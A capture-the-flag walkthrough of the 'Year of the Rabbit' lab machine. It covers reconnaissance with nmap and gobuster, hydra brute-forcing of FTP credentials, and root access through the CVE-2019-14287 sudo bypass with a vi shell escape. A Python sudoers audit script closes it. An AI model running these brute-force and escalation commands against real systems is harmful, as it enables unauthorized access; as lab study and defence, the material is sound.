# Year of the Rabbit

![](/files/-Mbhqyp24gh_82Mj9kYK)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**):

```
nmap -Pn 10.10.165.1
```

![](/files/-MbhrgbjxqzIp8HOjPoV)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 21,22,80
* (**-oN nmap**): Saving it into a file called nmap

```
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.165.1
```

![](/files/-MbhrjUURvLR8Te6PpPM)

## Enumeration

Let's visit the web server.

![](/files/-Mbhs80zuo5C8DHFDTTr)

It's an Apache2 default page, so let's run gobuster to find hidden directories and pages.

```
gobuster dir -u http://10.10.165.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
```

![](/files/-MbhtOpsyEggQwM0oDFh)

We found a directory called /assets, so let's go visit it.

![](/files/-MbhtfZG7rlUXZ7nmMCR)

There are two files. Let's check the first one, which is an mp4 video file. First we get a message telling us to turn off JavaScript, followed by a redirection to a Rick Astley video. RICK ROLLED!

Let's go turn off JavaScript: navigate to `about:config` in the browser, search for JavaScript, and change the `javascript.enabled` parameter to false.

![](/files/-MbhvkGKYqTtBMEU0hut)

Looking at the other file as well, we see something interesting.

![](/files/-Mbhw7EZm5Jo7vOWHBGQ)

Let's visit this page.

![](/files/-MbhwK2TmjsJabmLM4hG)

Listening through the audio, at second 56 we get the hint: "I'll put you out of your misery **burp** you're looking in the wrong place." They are probably hinting to use `Burpsuite`, so let's do that.

Let's capture the request made when visiting this page. After capturing the request and forwarding it once, you get something interesting.

![](/files/-MbhxWhvv3F-yCqNVtvn)

It's a directory, so let's go visit it.

![](/files/-MbhyCSuatWuDxvFmPWo)

There is one file, so let's check it out.

![](/files/-MbhyHlUNqB2OF5NME1l)

It's a picture. Let's use our steganography skills to see if there is anything hidden in the picture. First we need to download the file, so let's do that.

```
wget http://10.10.165.1/WExYY2Cv-qU/Hot_Babe.png
```

![](/files/-MbhymfyC0r93jKa84CV)

Now let's use `steghide` and `binwalk` to see if we can find anything in this image. There was nothing, so I just used `strings` on the image.

```
strings Hot_Babe.png
```

Once I did this, I got some output, and scrolling up a bit I found something interesting.

![](/files/-MbhzKkJrLQorFF69A2b)

So we have a username and a password list. Let's copy the password list to a file and use `hydra` to brute-force FTP with the username and password list we have. I saved the passwords into a file called `password.lst`.

## Exploitation

```
hydra -l ftpuser -P password.lst 10.10.165.1 ftp
```

![](/files/-MbhzsPuJF87duApFJyJ)

We found the password, so let's log in through FTP.

```
ftp 10.10.165.1
```

![](/files/-Mbi-2UyDQ-BNZZcFkVj)

We are logged in, so let's list the files.

![](/files/-Mbi-8Na6SH2hvnaoCIV)

Looks like there is a text file, so let's transfer it to our machine.

```
get Eli's_Creds.txt
```

![](/files/-Mbi-QD92eyKyAZuJbUx)

Let's read the file.

![](/files/-Mbi-lJ_c1BzZmkf7RZf)

I don't understand this code, so let's put it in a tool that does understand it.

![](/files/-Mbi0Fwt_1JmA8JMd6Qm)

Now we have a password, so let's use it to log in through SSH with the username we found too.

```
ssh eli@10.10.165.1 
```

![](/files/-Mbi0TxeZPxVd00QhZMT)

We are logged in, and we can see a message for us. We can find the user flag here, but we are not allowed to read it, so we have to escalate privileges.

![](/files/-Mbi0iqcdCdmGiLFrndj)

When we logged in, we saw a message for us: there seems to be a `leet s3cr3t hiding place`, and there is a hidden message there waiting for us. Let's find it using this command.

```
find / -name s3cr3t 2>/dev/null
```

![](/files/-Mbi1fssV7eiWUvgorwy)

It's a directory, so let's change into it.

```
cd /usr/games/s3cr3t
```

Let's list the files in the directory.

![](/files/-Mbi1wPFqQsHDirdFjdY)

Let's read this file.

![](/files/-Mbi25WtEb56fE3O7KQO)

Looks like we have the password for the user `Gwendoline`, so let's switch users.

```
su gwendoline
```

![](/files/-Mbi7-rZ_aYYVpU4xdku)

We can now read the `user.txt` file.

![](/files/-Mbi7EVXwjv-xRdrEv3I)

## Privilege Escalation

Let's run `sudo -l` to see what this user can run as root.

```
sudo -l
```

![](/files/-Mbi7VzIlTHk-lJZ2yT_)

Looks like we can run `/usr/bin/vi /home/gwendoline/user.txt` with sudo. I found this [article](https://www.whitesourcesoftware.com/resources/blog/new-vulnerability-in-sudo-cve-2019-14287/) on CVE-2019-14287 that explains very well what to do. First we use the command

```
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
```

And then we use this command

```
:!/bin/bash
```

And you are now root.

![](/files/-Mbi8h3eUTze56OzG-3b)

We can read the root flag.

![](/files/-Mbi8ocIopv4bJINWTxL)
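The escalation above combines two weaknesses: a sudo build that predates the CVE-2019-14287 fix, and an editor allowed through sudo that can spawn a shell. As an added example (not part of the original writeup), this audit flags both in a sudoers file. The sudoers fragment and version strings are constructed, and the `(ALL, !root)` Runas list is an assumption, since the page shows the `sudo -l` output only as a screenshot.

```python
import re

FIXED = (1, 8, 28)  # first sudo release with the CVE-2019-14287 fix
ESCAPING = {"vi", "vim", "view", "less", "more", "man"}  # can spawn a shell
RULE = re.compile(r"^(\S+)\s+\S+\s*=\s*\(([^)]*)\)\s*(.+)$")

# Constructed sudoers fragment. The Runas list on the first rule is an
# assumption; only the command path comes from the page.
SAMPLE = """\
# constructed sample
Defaults env_reset
gwendoline ALL=(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
backup ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
"""

def sudo_version(text):
    """Extract (major, minor, patch) from `sudo -V` output."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if m is None:
        raise ValueError("no version number found")
    return tuple(int(part) for part in m.groups())

def audit(sudoers, version_text):
    """Return (user, finding) pairs for risky rules."""
    patched = sudo_version(version_text) >= FIXED
    findings = []
    for line in map(str.strip, sudoers.splitlines()):
        m = RULE.match(line)
        if line.startswith("#") or m is None:
            continue
        user, runas, rest = m.groups()
        users = [r.strip() for r in runas.split(":")[0].split(",")]
        # "anyone but root" is the rule shape the uid -1 bypass defeats
        if "ALL" in users and {"!root", "!#0"} & set(users) and not patched:
            findings.append((user, "CVE-2019-14287"))
        tags, command = re.match(r"((?:[A-Z_]+:\s*)*)(.*)", rest).groups()
        program = (command.split() or [""])[0].rsplit("/", 1)[-1]
        # Without NOEXEC the editor's shell command runs as the target user
        if program in ESCAPING and "NOEXEC:" not in tags:
            findings.append((user, "shell-escape"))
    return findings

if __name__ == "__main__":
    for version in ("Sudo version 1.8.10p3", "Sudo version 1.8.28"):
        print(version, audit(SAMPLE, version))
```

Upgrading sudo clears only the first finding; the editor rule still needs the `NOEXEC` tag or a switch to `sudoedit`.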


